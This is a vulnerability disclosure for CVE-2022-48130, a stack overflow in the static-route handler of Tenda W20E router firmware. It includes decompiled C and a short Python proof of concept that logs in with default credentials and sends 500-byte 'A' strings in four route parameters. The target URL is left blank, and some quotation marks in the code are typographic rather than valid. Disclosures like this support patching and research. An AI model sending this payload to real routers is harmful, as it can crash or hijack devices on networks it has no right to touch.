CVE-2022-48130: fengsha/formSetStaticRoute.md at main · Stevenbaga/fengsha
Tenda W20E v15.11.0.6 was discovered to contain multiple stack overflows in the function formSetStaticRoute via the parameters staticRouteNet, staticRouteMask, staticRouteGateway, staticRouteWAN.
Tenda W20E****version
V15.11.0.6 (US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC)
In function formSetStaticRoute,the content obtained by the program from the parameter “staticRouteNet","staticRouteMask","staticRouteGateway","staticRouteWAN” are passed to net,mask,gateway and wan.Then the net,mask,gateway and wan are directly copied into the sMibValue stack through the sprintf function.There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.
void __cdecl formSetStaticRoute(webs_t wp, char_t *pPath, char_t *pQuery) { int v3; // r0 int v4; // r3 int v5; // r0 unsigned __int8 sNetctlParm[32]; // [sp+18h] [bp-164h] BYREF unsigned __int8 sMibName[32]; // [sp+38h] [bp-144h] BYREF unsigned __int8 sMibValue[256]; // [sp+58h] [bp-124h] BYREF int iListNum; // [sp+158h] [bp-24h] int iRouteIndex; // [sp+15Ch] [bp-20h] unsigned __int8 *wan; // [sp+160h] [bp-1Ch] unsigned __int8 *gateway; // [sp+164h] [bp-18h] unsigned __int8 *mask; // [sp+168h] [bp-14h] unsigned __int8 *net; // [sp+16Ch] [bp-10h] char_t *pRouteIndex; // [sp+170h] [bp-Ch] int iWanid; // [sp+174h] [bp-8h]
pRouteIndex = 0; net = 0; mask = 0; gateway = 0; wan = 0; memset(sMibValue, 0, sizeof(sMibValue)); *(_DWORD *)sMibName = 0; *(_DWORD *)&sMibName[4] = 0; *(_DWORD *)&sMibName[8] = 0; *(_DWORD *)&sMibName[12] = 0; *(_DWORD *)&sMibName[16] = 0; *(_DWORD *)&sMibName[20] = 0; *(_DWORD *)&sMibName[24] = 0; *(_DWORD *)&sMibName[28] = 0; *(_DWORD *)sNetctlParm = 0; *(_DWORD *)&sNetctlParm[4] = 0; *(_DWORD *)&sNetctlParm[8] = 0; *(_DWORD *)&sNetctlParm[12] = 0; *(_DWORD *)&sNetctlParm[16] = 0; *(_DWORD *)&sNetctlParm[20] = 0; *(_DWORD *)&sNetctlParm[24] = 0; *(_DWORD *)&sNetctlParm[28] = 0; iRouteIndex = 0; iListNum = 0; iWanid = 0; pRouteIndex = websGetVar(wp, "staticRouteIndex", byte_CFE00); iRouteIndex = atoi((const char *)pRouteIndex); if ( iRouteIndex + 1 <= 10 ) { net = websGetVar(wp, "staticRouteNet", byte_CFE00); mask = websGetVar(wp, "staticRouteMask", byte_CFE00); gateway = websGetVar(wp, "staticRouteGateway", byte_CFE00); wan = websGetVar(wp, "staticRouteWAN", byte_CFE00); if ( !strncmp("wan1", (const char *)wan, 4u) ) { iWanid = 0; } else if ( !strncmp("wan2", (const char *)wan, 4u) ) { iWanid = 1; } else if ( !strncmp("wan3", (const char *)wan, 4u) ) { iWanid = 2; } else if ( !strncmp("wan4", (const char *)wan, 4u) ) { iWanid = 3; } sprintf((char *)sMibValue, "%s;%s;%s;%d;WAN0", (const char *)net, (const char *)mask, (const char *)gateway, iWanid); sprintf((char *)sMibName, "adv.staticroute.list%d", iRouteIndex + 1); SetValue(sMibName, sMibValue); memset(sMibValue, 0, sizeof(sMibValue)); GetValue("adv.staticroute.listnum", sMibValue); v3 = atoi((const char *)sMibValue); iListNum = v3; v4 = iRouteIndex + 1; if ( v3 >= iRouteIndex + 1 ) v4 = v3; iListNum = v4; memset(sMibValue, 0, sizeof(sMibValue)); sprintf((char *)sMibValue, "%d", iListNum); v5 = SetValue("adv.staticroute.listnum", sMibValue); if ( CommitCfm(v5) ) { sprintf((char *)sNetctlParm, “advance_type=%d", 8); send_msg_to_netctrl(5, sNetctlParm); } outputToWebs(wp, “1”); } else { puts(“Static route list out of range”); } outputToWebs(wp, "-1”); }
import requests
cmd = b’staticRouteIndex=’ + b’9’ cmd += b’&staticRouteNet=’ + b’A’ * 500 cmd += b’&staticRouteMask=’ + b’A’ * 500 cmd += b’&staticRouteGateway=’ + b’A’ * 500 cmd += b’&staticRouteWAN=’ + b’A’ * 500
url = b"" payload = b"" + cmd
data = { "username": "admin", "password": "admin", }
def attack(): s = requests.session() resp = s.post(url=url, data=data) print(resp.content) resp = s.post(url=payload, data=data) print(resp.content)